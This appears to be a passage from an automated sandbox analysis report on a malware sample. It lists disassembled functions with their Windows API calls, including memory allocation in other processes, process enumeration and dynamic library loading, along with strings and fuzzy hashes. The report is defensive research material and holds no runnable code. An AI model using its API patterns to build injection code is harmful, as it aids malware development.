                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 420147892-0
                                                                • Opcode ID: 4268c1523dba11c55aa05e80329bed69229e4c20054c43d12c5a505e2f0c0522
                                                                • Instruction ID: 4a5e3fd28557056d0a7944e6af76196707c194f6f68b4348717bf49d1dd5a724
                                                                • Opcode Fuzzy Hash: 4268c1523dba11c55aa05e80329bed69229e4c20054c43d12c5a505e2f0c0522
                                                                • Instruction Fuzzy Hash: E4E14BB1A402569FEF00CF98ECC1B59B7B1EF59324F290475E906AB341D378B961CB62
                                                                Function 0041A3F7 Relevance: 6.2, APIs: 4, Instructions: 184stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000000,00000000), ref: 0041A471
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000,00000000,00000000,00000000,00000000), ref: 0041A4DF
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000,00000000,00000000,00000000,00000000), ref: 0041A56E
                                                                • strlen.MSVCRT ref: 0041A59A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$lstrlenstrlen
                                                                • String ID:
                                                                • API String ID: 1146637441-0
                                                                • Opcode ID: 0c658b49e81a3c6713a23b9e0b56cce7759df2fd06cb7deecbafc417db31bf50
                                                                • Instruction ID: 1ed418b653a11b3f03245520fcd6893037fe7db592e68cde69156d2519bd1c9a
                                                                • Opcode Fuzzy Hash: 0c658b49e81a3c6713a23b9e0b56cce7759df2fd06cb7deecbafc417db31bf50
                                                                • Instruction Fuzzy Hash: F55164B1E00319BBDF00DF95DC87BEFBBB5AB05714F14006AF604BA281D7795A508B9A
                                                                Function 0040A338 Relevance: 6.1, APIs: 4, Instructions: 137memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,00409A6D), ref: 0040A3B5
                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00409A6D), ref: 0040A3FC
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00409A6D), ref: 0040A440
                                                                • RtlReAllocateHeap.NTDLL(00000000,00000000,00000000,00000000), ref: 0040A4DB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$Allocate$ByteCharMultiProcessWide
                                                                • String ID:
                                                                • API String ID: 2529488297-0
                                                                • Opcode ID: 281a9d8b47f1579c2cf343d601bb36557cd907a5c85c17517ed2d3169f472379
                                                                • Instruction ID: 9704ec77b6c188b33aee6395679cd38600c11a93d96f49f18eb5294d2730441b
                                                                • Opcode Fuzzy Hash: 281a9d8b47f1579c2cf343d601bb36557cd907a5c85c17517ed2d3169f472379
                                                                • Instruction Fuzzy Hash: 09412974E40319FBDB009F90DD46BAEBB71FB0A704F104066FA047A2D1D3B95A60DB9A
                                                                Function 004AC064 Relevance: 6.1, APIs: 3, Instructions: 1583COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 004AC432
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000108), ref: 004AC8D7
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000028), ref: 004ACCEE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove
                                                                • String ID:
                                                                • API String ID: 1951056069-0
                                                                • Opcode ID: 913ff5a2519681b304e92d9d154333b9584e064f65dfde0384efe33d5939c1da
                                                                • Instruction ID: 8d7095cc10ac26fa4aae4f50465f74b64ce85441637d28cd090b275446585c5a
                                                                • Opcode Fuzzy Hash: 913ff5a2519681b304e92d9d154333b9584e064f65dfde0384efe33d5939c1da
                                                                • Instruction Fuzzy Hash: C1C26BB1A402569BFB00CF68DCC1B99B7B5FF69314F2800A5E949AF345D378B861CB25
                                                                Function 004805F0 Relevance: 6.1, APIs: 4, Instructions: 77libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00480619
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0048064D
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00480686
                                                                • FreeLibrary.KERNEL32(00000000), ref: 004806BC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Library$Free$AddressLoadProc
                                                                • String ID:
                                                                • API String ID: 1386263645-0
                                                                • Opcode ID: dd08a0b129e835c7341ee53d25648eacdba20f52a76bfba98aed461e65d8d52b
                                                                • Instruction ID: 0b36be4421df4ffe14451ddc10b0ef7eea8e3398015ed76abc2f8a05a57d9849
                                                                • Opcode Fuzzy Hash: dd08a0b129e835c7341ee53d25648eacdba20f52a76bfba98aed461e65d8d52b
                                                                • Instruction Fuzzy Hash: E5215E70D44308FBDB40AF91D886BADFB30AB06711F0090A6F5043A281E67A4A64DF8A
                                                                Function 0046483C Relevance: 6.1, APIs: 4, Instructions: 77libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000001,00000000,00000000), ref: 00464865
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00464899
                                                                • FreeLibrary.KERNEL32(00000000), ref: 004648D2
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00464908
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Library$Free$AddressLoadProc
                                                                • String ID:
                                                                • API String ID: 1386263645-0
                                                                • Opcode ID: 61867cee61673b8c5bc704db50f2db6c69816edac588f5e4c4e309f2d61891a7
                                                                • Instruction ID: 1c2fb0e7d49ca85341126b8136eb07d6b70494b27a7b4068fbaae1713d20d76b
                                                                • Opcode Fuzzy Hash: 61867cee61673b8c5bc704db50f2db6c69816edac588f5e4c4e309f2d61891a7
                                                                • Instruction Fuzzy Hash: 18211F74E44308FBDF10AF91D887BADBB30AB46711F0490A6F5443B191E3BA4A54DF9A
                                                                Function 0047C367 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 590COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0123456789ABCDEF
                                                                • API String ID: 0-2554083253
                                                                • Opcode ID: f2b3387e526ee5b74b23a205e3babc367f2dc42ec1d66071d9c1a4f9c1bea81b
                                                                • Instruction ID: 2dcbae8a514f4991762682b637e4a4e976e6ba90ed2f06e3aca33d0b6d3aab42
                                                                • Opcode Fuzzy Hash: f2b3387e526ee5b74b23a205e3babc367f2dc42ec1d66071d9c1a4f9c1bea81b
                                                                • Instruction Fuzzy Hash: 291272B1E40318BBDB00AF91ECC6FAEB774FB09715F14402EF6087A291D7B55A248B59
                                                                Function 00478875 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 288COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetProcessAffinityMask.KERNEL32(FFFFFFFF,00000001), ref: 00478899
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AffinityMaskProcess
                                                                • String ID: SysWOW64\$System32\
                                                                • API String ID: 1682748466-3355970615
                                                                • Opcode ID: c143c79d9f9a62d8f54c80bcca235d60cba4f5db886ebff09a9b945944dfcf5e
                                                                • Instruction ID: 600b19d7a304f7d6ae016af36924e3e5682a7f5f57c512ba0ad247e0f3559a8d
                                                                • Opcode Fuzzy Hash: c143c79d9f9a62d8f54c80bcca235d60cba4f5db886ebff09a9b945944dfcf5e
                                                                • Instruction Fuzzy Hash: F9A159B5F403097BFB10ABA19C87FBF7665DB14704F14442EFB0876382E6795A10879A
                                                                Function 00500C68 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 249COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _memset_sprintf
                                                                • String ID: @
                                                                • API String ID: 1557529856-2766056989
                                                                • Opcode ID: f069b91603a41ff908123fd5925583a40189015a3e8527e2ad4734a71876aac3
                                                                • Instruction ID: 5bcad89579a279ce71b0beade107a21a2cdafddcfe8c7a3c935b3859a84309d4
                                                                • Opcode Fuzzy Hash: f069b91603a41ff908123fd5925583a40189015a3e8527e2ad4734a71876aac3
                                                                • Instruction Fuzzy Hash: 8B912C72A0035696CF05CF38D8916F9BB64FF99310F1093A9DC8997283EF359A89C790
                                                                Function 0044681D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004468AC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID: $@
                                                                • API String ID: 4275171209-1077428164
                                                                • Opcode ID: 20e2ec048a465a2e59170b1eba84c793c3a44684f2b099a2b201507d676b7764
                                                                • Instruction ID: 39c837652ff9d56bb4902057a52924e340a8ea02d9208a91a936f42709c8c547
                                                                • Opcode Fuzzy Hash: 20e2ec048a465a2e59170b1eba84c793c3a44684f2b099a2b201507d676b7764
                                                                • Instruction Fuzzy Hash: E2112A75D41308FBEF109F90DC46B9D7B70EB05710F10806AFA143A2C1D3BA5A64DB9A
                                                                Function 0044298A Relevance: 4.9, APIs: 3, Instructions: 419memorysynchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00442F45: GetForegroundWindow.USER32(?,?,00000000,00000000,00000000), ref: 00442F9B
                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,?,00000040,?,?,?,?,?,?,00000000), ref: 00442BDF
                                                                • WaitForSingleObject.KERNEL32(00000000,FFFFFFFF,00000000,00000000,00000000,00000000,?,00000000,00000B20,?,00000000,00000000,?,00000000,00000000,00000008), ref: 00442D5C
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000B20,?,00000000,00000000,?,00000000,00000000,00000008,00000000,00000000,00000000,00000278,00000000), ref: 00442D88
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocCloseForegroundHandleObjectSingleVirtualWaitWindow
                                                                • String ID:
                                                                • API String ID: 2553280185-0
                                                                • Opcode ID: ef6cf1559c89dbac98a191ce5bfbc5be0582424dcbd67282d324ff1646f01fc1
                                                                • Instruction ID: 6d19b2bcda7f9e7db432ddcf5afe7b37357597235b535cbcc868892b0ae7d1c5
                                                                • Opcode Fuzzy Hash: ef6cf1559c89dbac98a191ce5bfbc5be0582424dcbd67282d324ff1646f01fc1
                                                                • Instruction Fuzzy Hash: 22F1DAB1E00318ABEB10DFD1DD8ABEEBBB9BB09705F10401AF5087B291D7B95914CB59
                                                                Function 004C445B Relevance: 4.9, APIs: 3, Instructions: 380COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 40cb84a174550b18d08bbe64178c67b10c17c7a3cf46723df5a5e0982bf711a0
                                                                • Instruction ID: 91cf720465cdb31803388e93ab6542436ccaf64936c6835739f5a00f8a6d0cc2
                                                                • Opcode Fuzzy Hash: 40cb84a174550b18d08bbe64178c67b10c17c7a3cf46723df5a5e0982bf711a0
                                                                • Instruction Fuzzy Hash: 05F1B130C0490DEBCF00AF92EA45AEEBF75FF48305F618099E491750A8CB7A4A75DB59
                                                                Function 0046A30C Relevance: 4.8, APIs: 2, Strings: 1, Instructions: 327stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0046A4B7
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0046A678
                                                                Strings
                                                                • ZwQueryInformationThread, xrefs: 0046A370
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
